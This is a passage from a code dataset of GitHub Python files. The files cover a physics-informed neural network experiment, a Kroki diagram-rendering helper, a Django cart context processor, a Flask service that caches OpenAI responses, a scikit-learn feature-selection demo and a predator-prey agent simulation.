experiment(self, n_samplings: int, n_train_r: int, r_weight_proportion: float,\n max_samplings: int, n_iters_per_sampling: int,\n coords2predict: np.ndarray, x_bounds: Bounds,\n intelligent_model: Callable[[], BaseModelFlow], **kwargs) -> List[np.ndarray]:\n # --------- core experiment --------- #\n num_per_dim2pred = len(coords2predict)\n sampler = partial(np.random.uniform, x_bounds.lower, x_bounds.upper)\n sampler = partial(np.linspace, x_bounds.lower, x_bounds.upper)\n boundary_condition = Condition(\n operator=VanillaBoundaryOperator(g=self.g, alpha=self.alpha, k=self.k, 
n=self.n),\n function=lambda x: 0 * x,\n sampling_strategy=[\n (\"x\", partial(np.linspace, x_bounds.lower, x_bounds.upper))\n ],\n valid_sampling_strategy=[\n (\"x\", partial(np.linspace, x_bounds.lower, x_bounds.upper))\n ],\n n_train=2\n )\n\n for i, epsilon in tqdm(enumerate(np.logspace(np.log10(self.epsilon), np.log10(0.05), self.num_epsilons)[::-1]),\n # for i, epsilon in tqdm(enumerate(np.linspace(self.epsilon, 0.05, self.num_epsilons)[::-1]),\n\n desc=\"Doing curriculum learning PINN\"):\n residuals = Condition(\n operator=VanillaOperator(epsilon=epsilon, potential=self.potential),\n function=lambda x: 0 * x,\n sampling_strategy=[\n (\"x\", sampler)\n ],\n valid_sampling_strategy=[\n (\"x\", partial(np.random.uniform, x_bounds.lower, x_bounds.upper))\n ],\n n_train=n_train_r\n )\n\n differential_equation = DifferentialEquation(\n name=\"DifferentialEquation\",\n domain_limits=[(\"x\", x_bounds)],\n boundary_condition=boundary_condition,\n residuals=residuals\n )\n\n pinn = PinnFlow(\n model=intelligent_model() if i == 0 else pinn.model,\n differential_equation=differential_equation,\n loss_metric=self.loss_metric,\n n_iters_per_sampling=n_iters_per_sampling,\n max_samplings=max_samplings,\n weight_proportion={\n \"boundary_condition\": 1 - r_weight_proportion,\n \"residuals\": r_weight_proportion\n },\n initialize=True if i == 0 else False\n )\n\n pinn.fit()\n\n # --------- processing data to save experiment --------- #\n u_predictions = pinn.predict(domain=coords2predict, which=\"u\").reshape((num_per_dim2pred))\n pinn.free_tf_session()\n del pinn\n # tf.get_default_graph().finalize()\n\n return [u_predictions]\n\n\nif __name__ == \"__main__\":\n experiment_path = Path.joinpath(results_path, 'VanillaCurriculumPINN')\n experiment_path.mkdir(parents=True, exist_ok=True)\n\n ve = VanillaCurriculumPinn(num_epsilons=5, epsilon=EPSILON, potential=potential, g=g, n=n, k=k,\n alpha=alpha, loss_metric=\"l2\")\n\n fig, ax = plt.subplots()\n for i in range(num_repetitions):\n u_predictions = ve.experiment(\n n_samplings=r_weight_proportion,\n n_train_r=n_train_r,\n r_weight_proportion=r_weight_proportion,\n max_samplings=1,\n n_iters_per_sampling=10000,\n coords2predict=domain_to_predict,\n x_bounds=Bounds(lower=0, upper=1),\n intelligent_model=lambda: NNFlow(hidden_layers=(2, 2),\n limit_zero=False), # True = NN*x(1-x)\n )\n\n plot_predictions(ax, coords2predict=domain_to_predict,\n exact_solution_function=exact_solution_function,\n u_predictions_best=u_predictions[-1],\n alpha=0.5 + 0.5 / num_repetitions)\n title = \"epsilon=\" + format(ve.epsilon) + \",iteration=\" + format(len(u_predictions)) + \",lambda\" + format(\n 1 - r_weight_proportion)\n plt.title(title)\n plt.savefig(\"{}/ApproxVSTrue.png\".format(experiment_path))\n plt.show()\n","repo_name":"agussomacal/ConDiPINN","sub_path":"src/experiments/Models/VanillaCurriculumLearning.py","file_name":"VanillaCurriculumLearning.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8531600009","text":"\"\"\"\n\"\"\"\n\nfrom pathlib import Path\n\nimport webbrowser\nimport sys, os\nimport base64\nimport zlib\nimport traceback\n\n\n__all__=[\"Diagram\", \"DrawItem\", \"DrawBase\", \"DiaModule\", \"list_dir\", \"load_module\"]\n\n\nKROKI = \"https://kroki.io/{type_name}/{render_type}/{hash}\"\n\nDIR_DESCRIPTION_FILE = \"__description__.py\"\n\nDIAGRAM_TYPES = {\n \"blockdiag\":\"BlockDiag\",\n \"bpmn\": \"BPMN\",\n \"bytefield\": 
\"Bytefield\",\n    \"seqdiag\": \"SeqDiag\",\n    \"actdiag\": \"ActDiag\",\n    \"nwdiag\": \"NwDiag\",\n    \"packetdiag\": \"PacketDiag\",\n    \"rackdiag\": \"RackDiag\",\n    \"c4plantuml\": \"C4 with PlantUML\",\n    \"ditaa\": \"Ditaa\",\n    \"erd\": \"Erd\",\n    \"excalidraw\": \"Excalidraw\",\n    \"graphviz\": \"GraphViz\",\n    \"mermaid\": \"Mermaid\",\n    \"nomnoml\": \"Nomnoml\",\n    \"pikchr\": \"Pikchr\",\n    \"plantuml\": \"PlantUML\",\n    \"structurizr\": \"Structurizr\",\n    \"svgbob\": \"Svgbob\",\n    \"vega\": \"Vega\",\n    \"vegalite\": \"Vega-Lite\",\n    \"wavedrom\": \"WaveDrom\",\n}\n\n\nclass Diagram:\n    \"\"\"\n    Base class for diagrams\n    \"\"\"\n    _dia_types = {}\n\n    @classmethod\n    def register(cls, name, class_obj):\n        cls._dia_types[name] = class_obj\n\n    def __init__(self):\n        \"\"\"\n        \"\"\"\n\n    def perp_url(self, draw, render_type=\"svg\"):\n        code = draw._get_code()\n        c = self.calc_code(code)\n        return KROKI.format(type_name=draw._type_name, render_type=render_type, hash=c)\n\n    def open_in_browser(self, draw):\n        \"\"\"\n        \"\"\"\n        webbrowser.open(self.perp_url(draw))\n\n    def render_to_file(self, draw, fname, render_type=\"svg\"):\n        import requests\n        r = requests.get(self.perp_url(draw), stream=True)\n        if r.status_code == 200:\n            with open(fname, 'wb') as f:\n                for chunk in r.iter_content(1024):\n                    f.write(chunk)\n        else:\n            print(r.status_code)\n        r.close()\n\n    def get_svg(self, draw):\n        import requests\n        r = requests.get(self.perp_url(draw), stream=True)\n        if r.status_code == 200:\n            res = bytearray()\n            for chunk in r.iter_content(1024):\n                res += chunk\n            r.close()\n        else:\n            raise Exception(f\"Status: {r.status_code}\")\n        return res\n\n    def calc_code(self, txt):\n        #import sys; import base64; import zlib; print(base64.urlsafe_b64encode(zlib.compress(sys.stdin.read().encode('utf-8'), 9)).decode('ascii'))\n        res = base64.urlsafe_b64encode(zlib.compress(txt.encode('utf-8'), 9)).decode('ascii')\n        return res\n\n    def init_draw(self, draw_type):\n        \"\"\"\n        Returns a \"drawer\" object of the corresponding type\n        \"\"\"\n        dt = self._dia_types.get(draw_type)\n        if not dt:\n            return DrawBase(draw_type, self)\n        else:\n            return dt(draw_type, self)\n\n    def display(self, draw, display=None):\n        \"\"\"\n        Displays the SVG in a Jupyter notebook\n        \"\"\"\n        from IPython import display\n        return display.SVG(self.get_svg(draw).decode(\"utf-8\"))\n\n    @classmethod\n    def display_code(cls, draw_type, code):\n        \"\"\"\n        Displays svg from code of type draw_type\n        \"\"\"\n        obj = cls()\n        d = obj.init_draw(draw_type)\n        d.code(code)\n        return d\n\n\nclass DrawItem:\n    base = None\n    prefix = \"state\"\n\n    def __init__(self, sid=None):\n        \"\"\"\n        \"\"\"\n        if not sid:\n            self.state_id = self.base._get_id(prefix=self.prefix)\n        else:\n            self.state_id = sid\n\n\nclass DrawBase:\n    \"\"\"\n    Provides methods for generating a diagram and collects the result\n    \"\"\"\n\n    def __init__(self, type_name, diagram):\n        \"\"\"\n        \"\"\"\n        self._type_name = type_name\n        self._plain_code = None\n        self._buffer = []\n        self._cur_level = 0\n        self._indent_size = 4\n        self._cur_id = 0\n        self._diagram = diagram\n\n    @property\n    def code_0(self):\n        return self._prep_item(DICode)\n\n    @classmethod\n    def register_item(cls, name, shortname=None):\n\n        class _ItemDescr:\n            def __init__(self, itm_cls):\n                self.itm_cls = itm_cls\n            def __get__(self, instance, owner):\n                if instance:\n                    return instance._prep_item(self.itm_cls)\n                else:\n                    return self.itm_cls\n\n        def func(act_cls):\n            setattr(cls, name, _ItemDescr(act_cls))\n            if shortname:\n                setattr(cls, shortname, _ItemDescr(act_cls))\n            return act_cls
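\n        # hand the decorator back so item classes can be registered via @DrawBase.register_item(\"code\") or @DrawBase.register_item(\"template\", \"tmpl\")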
\n        return func\n\n    def _prep_item(self, item_class):\n        return type(item_class.__name__, (item_class,), {\"base\":self})\n\n    def _set_code(self, code_text):\n        self._plain_code = code_text\n\n    def _get_id(self, prefix=None):\n        if prefix is None:\n            prefix = \"state\"\n        self._cur_id += 1\n        return \"{}_{}\".format(prefix, self._cur_id)\n\n    def _add(self, code_line):\n        \"\"\"\n        Append a line of code to the buffer\n        \"\"\"\n        self._buffer.append(self._set_indent(code_line))\n\n    def _set_indent(self, code_line):\n        if self._cur_level:\n            return \" \"*(self._cur_level*self._indent_size) + code_line\n        else:\n            return code_line\n\n    def _inc_level(self):\n        \"\"\"\n        \"\"\"\n        self._cur_level += 1\n\n    def _dec_level(self):\n        \"\"\"\n        \"\"\"\n        if self._cur_level:\n            self._cur_level -= 1\n\n    def _get_code(self):\n        if self._plain_code:\n            return self._plain_code\n        return \"\\n\".join(self._buffer)\n\n    def _repr_svg_(self):\n        \"\"\"\n        \"\"\"\n        return self._diagram.get_svg(self).decode(\"utf-8\")\n\n\n@DrawBase.register_item(\"code\")\nclass DICode(DrawItem):\n    \"\"\"\n    An element containing code written in the diagram language.\n    ??If present, it defines the whole diagram and everything else is ignored\n    \"\"\"\n\n    def __init__(self, txt):\n        \"\"\"\n        \"\"\"\n        self.base._set_code(txt)\n\n\n@DrawBase.register_item(\"template\", \"tmpl\")\nclass DITemplate(DrawItem):\n    \"\"\"\n    An element containing code with expandable template parts.\n    context::dict -- data dictionary used as the rendering context.\n    tmpl_lang::str -- identifier of a templating engine installed on the system\n    tmpl_id::str -- identifier of a template sub-block, for inclusion into the main template.\n        if set, the block is not rendered on its own, only through the master template.\n    sid::str -- identifier of the block in the diagram\n    \"\"\"\n\n    def __init__(self, txt, context=None, tmpl_lang=None, tmpl_id=None, sid=None):\n        \"\"\"\n        \"\"\"\n        pass\n\n\ndef _dir_clear(base_dir, dir_path):\n    base_dir = base_dir.rstrip(\"/\")\n    if not dir_path or dir_path==\"/\":\n        dir_path = \"\"\n    elif not dir_path.startswith(\"/\"):\n        dir_path = \"/\"+dir_path\n    return base_dir, dir_path\n\n\ndef list_dir(base_dir, dir_path):\n    \"\"\"\n    Returns the list of files in the given directory.\n    Python modules are imported (if possible) so their descriptions can be read.\n    The first element of the list is the description of the directory itself.\n\n    List items: {name, title, description, detail, tags, dia_type, is_dir, link}\n    \"\"\"\n    #base_dir, dir_path = _dir_clear(base_dir, dir_path)\n    #dirname = base_dir + dir_path\n\n    base_dir = Path(base_dir)\n    dir_path = Path(\"./\"+dir_path)\n    dirname = base_dir / dir_path\n\n    res = []\n    dirs = []\n    dir_descr = None\n    for entry in dirname.iterdir():\n        if str(entry).startswith('.'):\n            continue\n        if entry.name==DIR_DESCRIPTION_FILE:\n            dir_descr = _proc_dir_descr(base_dir, entry)\n            continue\n        if entry.name.startswith('_'):\n            continue\n        if entry.suffix == \".py\":\n            itm = _proc_module(base_dir, entry)\n        elif entry.is_file():\n            itm = dict(\n                name=str(entry),\n                title=entry.name,\n                description=\"\",\n                detail=None,\n                tags=[],\n                dia_type=None,\n                is_dir=False,\n                #link=dir_path + \"/\" + entry.name,\n                link=None,\n            )\n        else:\n            itm = _proc_subdir_descr(base_dir, entry)\n            \"\"\"\n            itm = dict(\n                name=str(entry),\n                title=entry.name,\n                description=\"\",\n                detail=None,\n                tags=[],\n                dia_type=None,\n                is_dir=True,\n                link=\"/\"+str(entry.relative_to(base_dir)),\n            )\n            \"\"\"\n        if itm[\"is_dir\"]:\n            dirs.append(itm)\n        else:\n            res.append(itm)\n\n    return dirs+res, dir_descr\n\n\ndef load_module(in_file):\n    \"\"\"\n    Loads and executes a module. Returns a dict with the module's objects.\n    \"\"\"\n    if isinstance(in_file, str):\n        in_file = Path(in_file)\n    if isinstance(in_file, Path):\n        with in_file.open('r', encoding=\"utf-8\") as fm:\n            buf = \"\".join([l for l in fm])\n        module_name = in_file\n    else:\n        buf = in_file.read()\n        module_name = \"\"\n\n    mc = compile(buf, module_name, \"exec\")\n    module = {}\n    exec(mc, module)\n\n    return module\n\n\nclass EModuleLoadError(Exception):\n    pass\n\n\nclass EUnknownType(Exception):\n    pass\n\n\nclass ENoDiagramCode(Exception):\n    pass\n\n\nclass EDiagramProcessError(Exception):\n    pass\n\n\nDEFAULT_TEMPLATE = \"\"\"\n
<div>\n    <h1>{title}</h1>\n    <p>{description}</p>\n    <img src=\"{image_url}\" />\n    <div>{detail}</div>\n</div>
\n\"\"\"\n\nclass DiaModule:\n    \"\"\"\n    Work with a python diagram module.\n    \"\"\"\n\n    def __init__(self, module_name, raise_errors=True, template=None):\n        \"\"\"\n        Loads the module from the file module_name\n        \"\"\"\n\n        self.error = None\n        self.raise_errors = raise_errors\n        self.diagram = None\n        self.draw = None\n        self.module_name = module_name\n        if not template:\n            self.template = DEFAULT_TEMPLATE\n        else:\n            self.template = template\n        try:\n            self.module = load_module(module_name)\n        except Exception as e:\n            traceback.print_exc()\n            if raise_errors:\n                raise EModuleLoadError(str(e))\n            else:\n                self.error = \"Error while loading the module\"\n            return\n\n        self.dtype = self.module.get(\"DIAGRAM_TYPE\")\n        if not self.dtype:\n            if raise_errors:\n                raise EUnknownType(\"Unknown diagram type\")\n            else:\n                self.error = \"Diagram type is not set\"\n            return\n\n        self.draw_func = self.module.get(\"draw\")\n        self.code_block = self.module.get(\"CODE\")\n        if not (self.draw_func or self.code_block):\n            if raise_errors:\n                raise ENoDiagramCode(\"No diagram code given\")\n            else:\n                self.error = \"Diagram code is not set\"\n            return\n\n    def get_diagram(self):\n        \"\"\"\n        Generates the diagram from the module data\n        \"\"\"\n\n        self.diagram = Diagram()\n        try:\n            d = self.diagram.init_draw(self.dtype)\n            if self.draw_func:\n                self.draw_func(d)\n            else:\n                d.code(self.code_block)\n        except Exception as e:\n            traceback.print_exc()\n            if self.raise_errors:\n                raise EDiagramProcessError(str(e))\n            else:\n                self.error = \"Error during generation: {}\".format(str(e))\n            return\n\n        self.draw = d\n        return self.draw\n\n    @property\n    def title(self):\n        return self.module.get(\"TITLE\", self.module_name)\n\n    @property\n    def description(self):\n        return self.module.get(\"DESCRIPTION\", \"\")\n\n    @property\n    def detail(self):\n        return self.module.get(\"DETAIL\", \"\")\n\n    @property\n    def image_url(self):\n        if self.error:\n            return None\n        if not self.draw:\n            self.get_diagram()\n        if self.error:\n            return None\n        return self.diagram.perp_url(self.draw)\n\n    @property\n    def svg(self):\n        \"\"\"\n        Returns the SVG code for further use\n        \"\"\"\n        if self.error:\n            return None\n        if not self.draw:\n            self.get_diagram()\n        if self.error:\n            return None\n        return self.diagram.get_svg(self.draw).decode(\"utf-8\")\n\n    def display_svg(self):\n        \"\"\"\n        Display only the diagram picture (svg) in Jupyter\n        \"\"\"\n        if self.error:\n            return self.error\n        svg = self.svg\n        if self.error:\n            return self.error\n        from IPython import display\n        return display.SVG(svg)\n\n    def _repr_html_(self):\n        self.get_diagram()\n        if self.error:\n            return '<div>Error during generation</div>
'\n        res = self.template.format(\n            title=self.title,\n            description=self.description,\n            image_url=self.image_url,\n            detail=self.detail)\n        return res\n\n\ndef _proc_dir_descr(base_dir, entry):\n    itm = dict(\n        name=str(entry),\n        title=entry.name,\n        link=\"/\"+str(entry.relative_to(base_dir)),\n        description=\"\",\n        detail=\"\",\n        tags=[],\n        dia_type=None,\n        is_dir=False,\n    )\n\n    try:\n        module = load_module(entry)\n    except Exception as e:\n        traceback.print_exc()\n        itm[\"link\"] = None\n        itm[\"description\"] = \"== import error ==\"\n        return itm\n    itm[\"title\"] = module.get(\"TITLE\", entry.name)\n    itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n    itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n    return itm\n\n\ndef _proc_subdir_descr(base_dir, entry):\n    entry_d = entry / Path(DIR_DESCRIPTION_FILE)\n    itm = dict(\n        name=str(entry),\n        title=entry.name,\n        link=\"/\"+str(entry.relative_to(base_dir)),\n        description=\"\",\n        detail=\"\",\n        tags=[],\n        dia_type=None,\n        is_dir=True,\n    )\n    if entry_d.exists():\n        try:\n            module = load_module(entry_d)\n        except Exception as e:\n            traceback.print_exc()\n            itm[\"link\"] = None\n            itm[\"description\"] = \"== import error ==\"\n            return itm\n        itm[\"title\"] = module.get(\"TITLE\", entry.name)\n        itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n        itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n    return itm\n\n\ndef _proc_module(base_dir, entry):\n    \"\"\"\n    base_dir, entry::Path\n    \"\"\"\n    #base_dir, dir_path = _dir_clear(base_dir, dir_path)\n\n    #in_file = base_dir + dir_path +\"/\" + entry.name\n\n\n    itm = dict(\n        name=str(entry),\n        title=entry.name,\n        link=\"/\"+str(entry.relative_to(base_dir)),\n        description=\"\",\n        detail=\"\",\n        tags=[],\n        dia_type=None,\n        is_dir=False,\n    )\n\n    try:\n        module = load_module(entry)\n    except Exception as e:\n        traceback.print_exc()\n        itm[\"link\"] = None\n        itm[\"description\"] = \"== import error ==\"\n        return itm\n    itm[\"title\"] = module.get(\"TITLE\", entry.name)\n    itm[\"description\"] = module.get(\"DESCRIPTION\", \"\")\n    itm[\"detail\"] = module.get(\"DETAIL\", \"\")\n\n    return itm\n\n","repo_name":"Alex-vz/danc_python","sub_path":"code/danc_python/bases.py","file_name":"bases.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"12986915085","text":"from .models import Category,Cart,CartItem\nfrom .views import _cart_id\ndef 
layout_context(request):\n categories = Category.objects.all()\n counter = 0\n if 'admin' in request.path:\n return {}\n try:\n cart = Cart.objects.filter(cart_id = _cart_id(request))\n if request.user.is_authenticated:\n cart_items = CartItem.objects.filter(customer__id = request.user.id)\n else: \n cart_items = CartItem.objects.filter(cart = cart[:1])\n for cart_item in cart_items:\n counter += cart_item.quantity\n except:\n pass\n\n return {\n 'categories':categories ,\n 'count':counter\n\n }\n\n \n\n","repo_name":"sanoy-si/ECommerce","sub_path":"shop/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38763632962","text":"import json\nimport os\n\nfrom flask import Flask, jsonify, request\nimport openai\nfrom dotenv import load_dotenv\nimport hashlib\nfrom apig_wsgi import make_lambda_handler\nimport boto3\n\napp = Flask(__name__)\n\n\n# Just to be sure that the endpoint itself works\n@app.route('/')\ndef main():\n return \"working\"\n\n\n@app.route('/api/get_completion', methods=['POST'])\ndef post_data():\n data = request.get_json()\n # print(data.keys())\n\n prompt = data['prompt']\n res,cache_key = get_openai_response(prompt)\n try:\n res = json.loads(res, strict=False)\n except Exception as err:\n print('non-json response', err, prompt, res)\n return jsonify({\"err\": \"non-json-response-from-oai\"}), 400\n\n content = None\n try:\n content = res['choices'][0]['message']['content']\n except:\n print('res:', res)\n return jsonify({\"err\": \"oai-response-wrong-format\", \"cache_key\": cache_key}), 400\n\n try:\n print('content: ', content)\n content = json.loads(content, strict=False)\n except Exception as inst:\n print('request:', request.data)\n print('response:', res)\n print('decoding error', inst)\n print('cache key', cache_key)\n return jsonify({\"err\": \"cgpt-response-not-in-json\", \"cache_key\": cache_key}), 400\n # print(content)\n\n return jsonify(content)\n\n\nclass LocalCacher:\n def __init__(self, cache_dir='./.cache'):\n self.dir = cache_dir\n\n def key_exists(self, key):\n return os.path.isfile(os.path.join(self.dir, key))\n\n def get(self, key):\n file_name = os.path.join(self.dir, key)\n with open(file_name, 'r') as f:\n return f.read()\n\n def put(self, key, value):\n file_name = os.path.join(self.dir, key)\n with open(file_name, 'w') as f:\n f.write(value)\n\n\nclass S3Cacher:\n def __init__(self, bucket_name, prefix='cache'):\n self.bucket_name = bucket_name\n self.prefix = prefix\n self.s3 = boto3.client('s3')\n\n def get_key(self, key):\n return f\"{self.prefix}/{key}\" if self.prefix else key\n\n def key_exists(self, key):\n s3_key = self.get_key(key)\n try:\n self.s3.head_object(Bucket=self.bucket_name, Key=s3_key)\n return True\n except:\n return False\n\n def get(self, key):\n s3_key = self.get_key(key)\n obj = self.s3.get_object(Bucket=self.bucket_name, Key=s3_key)\n return obj['Body'].read().decode('utf-8')\n\n def put(self, key, value):\n s3_key = self.get_key(key)\n self.s3.put_object(Bucket=self.bucket_name, Key=s3_key, Body=value)\n\n\ndef get_openai_response(prompt, system=\"you are a helpful assistant\", suffix=None):\n \"\"\"\n Makes a cached API call to OpenAI\n :param prompt:\n :param system:\n :param suffix:\n :return:\n \"\"\"\n cacher = None\n if 'S3_BUCKET' in os.environ:\n # TODO: instantiate S3 cacher\n cacher = S3Cacher(os.environ['S3_BUCKET'])\n pass\n else:\n cacher = 
LocalCacher()\n\n cache_key = f\"{prompt.strip()}{system.strip()}{suffix.strip() if suffix is not None else ''}\"\n h = hashlib.new('sha256')\n h.update(cache_key.encode('utf-8'))\n cache_key = h.hexdigest()\n if cacher.key_exists(cache_key):\n contents = cacher.get(cache_key)\n return contents, cache_key\n newline = '\\n'\n messages = [\n {\"role\": \"system\", \"content\": system},\n {\"role\": \"user\", \"content\": f\"{prompt.strip()}{f'{newline}{suffix}' if suffix is not None else ''}\"},\n ]\n print('begin resp')\n oai_response = get_raw_openai_response(messages)\n print('end resp')\n\n cacher.put(cache_key, json.dumps(oai_response))\n return json.dumps(oai_response), cache_key\n\n\n# makes an actual OpenAI request\ndef get_raw_openai_response(messages):\n model = \"gpt-3.5-turbo\"\n # print(messages)\n resp = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=0\n )\n return resp\n\n\n# if you need an example recursive request to play with\n# example_req = \"\"\"\n# Act as a c-level executive assistant. You are tasked to write press release and an FAQ about new product launch.\n# It should conform to Amazon's Working Backwards process,\n# The product is a new plush toy headcrab from HalfLife, it will be sold in our e-shop and delivered globally.\n# Ask required questions and write a resulting document when ready.\n# answer only in JSON of the following format:\n# {\n# \"questions\": [ \"question1\", \"question2\",...],\n# \"prfaq\": \"prfaq\",\n# \"comments\": \"if you want to add something freeform\"\n# }\n# \"\"\"\n\n# entry point for a lambda function\nlambda_handler = make_lambda_handler(app)\n\n# entry point for the local startup\nif __name__ == '__main__':\n load_dotenv()\n app.run(debug=True)\n","repo_name":"umaxfun/sheetgpt","sub_path":"sheetgpt.py","file_name":"sheetgpt.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"38942875730","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.model_selection import train_test_split\n\ncancer = load_breast_cancer()\nprint(\"cnacer.data.shape: {}\".format(cancer.data.shape))\n\n\nimport numpy as np\nrng = np.random.RandomState(42)\nnoise = rng.normal(size=(len(cancer.data), 50))\nprint(\"noise.shape: {}\".format(noise.shape))\n\nX_w_noise = np.hstack([cancer.data, noise])\nprint(\"X_w_noise.shape: {}\".format(X_w_noise.shape))\n\nX_train, X_test, y_train, y_test = train_test_split(X_w_noise, cancer.target, random_state=0, test_size=.5)\n\nselect = SelectPercentile(percentile=50)\nselect.fit(X_train, y_train)\n\nX_train_selected = select.transform(X_train)\n\nprint(\"X_train.shape: {}\".format(X_train.shape))\nprint(\"X_train_selected.shape: {}\".format(X_train_selected.shape))\n\n# Print selected features\nmask = select.get_support()\nprint(mask.shape)\n\nprint(mask.reshape(1, -1).shape)\n\nimport matplotlib.pyplot as plt\nplt.matshow(mask.reshape(1, -1), cmap='gray_r')\nplt.xlabel(\"Feature Number\")\nplt.show()\n","repo_name":"socurites/book-ml-with-python-example","sub_path":"chap4/feature_selection/univariate_statistics.py","file_name":"univariate_statistics.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15535563762","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 30 13:56:09 
2023\n\n@author: pascal\n\"\"\"\n\nfrom pylab import *\nimport copy as cp\nfrom numba import njit\n\nprey0 = 400 # initial prey population\nK = 500 # carrying capacity of prey\nprey_m = 0.03 # magnitude of movement of prey\nprey_d = 0.8 # death rate of prey\nprey_r = 0.1 # reproduction rate of prey\n\npred0 = 100 # initial predator population\nMaxPred = 1000 # max number of predators\npred_m = 0.05 # magnitude of movement of predators\npred_d = 0.1 # death rate of predators\npred_r = 0.5 # reproduction rate of predators\n\nr = 0.01 # 0.02 radius for proximity detection\nmut = 0.01 # mutation rate\n\nclass agent:\n pass\n\ndef initialise():\n #create lists for agents, populations, mobility, and reproduction\n global agents, preydata, preddata, preymob, predmob, preyrep, predrep \n agents = []\n preydata = []\n preddata = []\n preymob = []\n predmob = []\n preyrep = []\n predrep = []\n \n for i in range(prey0 + pred0):\n ag = agent()\n ag.type = 'prey' if i < prey0 else 'pred'\n ag.x = random()\n ag.y = random()\n ag.m = prey_m if i < prey0 else pred_m\n ag.r = prey_r if i < prey0 else pred_r\n agents.append(ag)\n\ndef observe():\n global agents, preydata, preddata, preymob, predmob, preyrep, predrep\n \n subplot(2, 2, 1) # now we need 2 rows and 2 columns for 4 plots; 1=top left\n cla()\n \n preys = [ag for ag in agents if ag.type == 'prey']\n if len(preys) > 0:\n x = [ag.x for ag in preys]\n y = [ag.y for ag in preys]\n plot(x, y, color='blue', marker='.', ls=\"\") \n # another way of setting colour and style, \n # ls is line style,which we dont want \n \n predators = [ag for ag in agents if ag.type == 'pred']\n if len(predators) > 0:\n x = [ag.x for ag in predators]\n y = [ag.y for ag in predators]\n plot(x, y, color = 'red', marker='o', ls=\"\")\n axis('image')\n axis([-0.1, 1.1, -0.1, 1.1]) #notice extension\n\n subplot(2, 2, 2) # population plot\n cla()\n plot(preydata, label = 'prey', color=\"blue\")\n plot(preddata, label = 'predator', color=\"red\")\n title('Population')\n legend()\n\n subplot(2, 2, 3) # movement rate plot\n cla()\n plot(preymob, label = 'prey', color=\"blue\")\n plot(predmob, label = 'predator', color=\"red\")\n title('Movement rate')\n legend()\n \n subplot(2, 2, 4) # reproduction rate plot\n cla()\n plot(preyrep, label = 'prey', color=\"blue\")\n plot(predrep, label = 'predator', color=\"red\")\n title('Reproductive rate')\n legend()\n tight_layout()\n \ndef update_agent():\n global agents\n if agents == []:\n return\n ag = choice(agents)\n\n # detecting neighbours\n neighbours = [nb for nb in agents if nb.type != ag.type\n and (ag.x - nb.x)**2 + (ag.y - nb.y)**2 < r**2]\n\n if ag.type == 'prey':\n mprey = ag.m\n rprey = ag.r\n if len(neighbours) > 0: # if there are predators nearby\n if random() < prey_d:\n agents.remove(ag)\n return\n else: # if you didn't die, run!\n ag.x += uniform(-mprey, mprey)\n ag.y += uniform(-mprey, mprey)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x\n ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y \n else: # reproduce if there are no predators\n if random() < rprey*(1-sum([1 for x in agents if x.type == 'prey'])/K):\n offspring = cp.copy(ag)\n offspring.m = ag.m + uniform(-mut, mut) # offspring movement mutates\n offspring.r = ag.r + uniform(-mut, mut) # offspring reproductive rate mutates\n agents.append(offspring)\n ag.x += 0.9*uniform(-mprey, mprey) # then agent moves, but at slower rate if there are no predators\n ag.y += 0.9*uniform(-mprey, mprey)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x # stay uîside plot\n 
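# clamp the y coordinate to the unit square as well
            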
ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y \n \n else: # if agent is a predator\n mpred = ag.m\n rpred = ag.r\n if len(neighbours) == 0: # if there are no prey nearby\n if random() < pred_d:\n agents.remove(ag)\n return\n else: # if no prey and predator doesnt die, predator must move\n ag.x += uniform(-mpred, mpred)\n ag.y += uniform(-mpred, mpred)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x\n ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y\n \n else: # if there is prey nearby, stay and reproduce\n if random() < rpred*(1-sum([1 for x in agents if x.type == 'pred'])/MaxPred):\n offspring = cp.copy(ag)\n offspring.m = ag.m + uniform(-mut, mut)\n offspring.r = ag.r + uniform(-mut, mut)\n agents.append(offspring)\n\ndef update():\n global agents, preydata, preddata, preymob, predmob\n t = 0\n while t < 1 and len(agents) > 0:\n t += 1 / len(agents)\n update_agent()\n\n preydata.append(sum([1 for x in agents if x.type == 'prey'])) # store information on population, movement, reproduction\n preddata.append(sum([1 for x in agents if x.type == 'pred']))\n preymob.append(mean([t.m for t in agents if t.type == 'prey']))\n predmob.append(mean([t.m for t in agents if t.type == 'pred']))\n preyrep.append(mean([u.r for u in agents if u.type == 'prey']))\n predrep.append(mean([u.r for u in agents if u.type == 'pred']))\n \n\nsteps = 100 \nflag = True\nk = 0\ninitialise()\nfig =figure()\n# ax = add_subplot(1,2,1)\nobserve()\n\nwhile flag: \n k += 1\n update()\n if k%1 == 0:\n # ax.clear()\n observe()\n plt.pause(0.01)\n","repo_name":"pascalbartschi/modelling_cultural_evo","sub_path":"Agent_based_Modelling/ABM3_Predator_prey_evolution_spyder.py","file_name":"ABM3_Predator_prey_evolution_spyder.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72187207209","text":"from contextlib import redirect_stdout\nimport dataclasses\nfrom io import 